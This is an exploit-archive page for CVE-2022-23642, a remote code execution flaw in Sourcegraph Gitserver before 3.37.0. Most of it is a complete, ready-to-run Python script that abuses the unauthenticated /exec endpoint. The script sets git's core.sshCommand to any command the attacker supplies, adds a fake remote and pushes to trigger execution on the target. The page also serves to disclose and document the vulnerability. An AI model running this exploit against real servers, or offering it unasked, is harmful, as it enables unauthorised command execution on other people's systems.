Sourcegraph Gitserver 3.36.3 Remote Code Execution (RCE)

2022.07.23
Credit: Altelus
Risk: High
Local: No
Remote: Yes
CWE: CWE-94

# Exploit Title: Sourcegraph Gitserver 3.36.3 - Remote Code Execution (RCE) # Date: 2022-06-10 # Exploit Author: Altelus # Vendor Homepage: https://about.sourcegraph.com/ # Version: 3.63.3 # Tested on: Linux # CVE : CVE-2022-23642 # Docker Container: sourcegraph/server:3.36.3 # Sourcegraph prior to 3.37.0 has a remote code execution vulnerability on its gitserver service. # This is due to lack of restriction on git config execution thus "core.sshCommand" can be passed # on the HTTP arguments which can contain arbitrary bash commands. Note that this is only possible # if gitserver is exposed to the attacker. This is tested on Sourcegraph 3.36.3 # # Exploitation parameters: # - Exposed Sourcegraph gitserver # - Existing repo on sourcegraph import json import argparse import requests def exploit(host, existing_git, cmd): # setting sshCommand data = { "Repo" : existing_git, "Args" : [ "config", "core.sshCommand", cmd ] } res = requests.get(host+"/exec", json=data).text if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0) # setting fake origin data = { "Repo" : existing_git, "Args" : [ "remote", "add", "origin", "git@lolololz:foo/bar.git" ] } res = requests.get(host+"/exec", json=data).text if len(res) > 0: print("[-] Didn't work: {}".format(res)) exit(0) # triggering command using push data = { "Repo" : existing_git, "Args" : [ "push", "origin", "master" ] } res = requests.get(host+"/exec", json=data).text print("[*] Finished executing exploit") parser = argparse.ArgumentParser() parser.add_argument('--gitserver-host', required=True, help="Target Sourcegraph Gitserver Host") parser.add_argument('--existing-git', required=True, help="e.g. Link of existing repository in target Sourcegraph") parser.add_argument('--cmd', required=True, help="Command to run") args = parser.parse_args() host = args.gitserver_host existing_git = args.existing_git cmd = args.cmd exploit(host, existing_git, cmd)


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top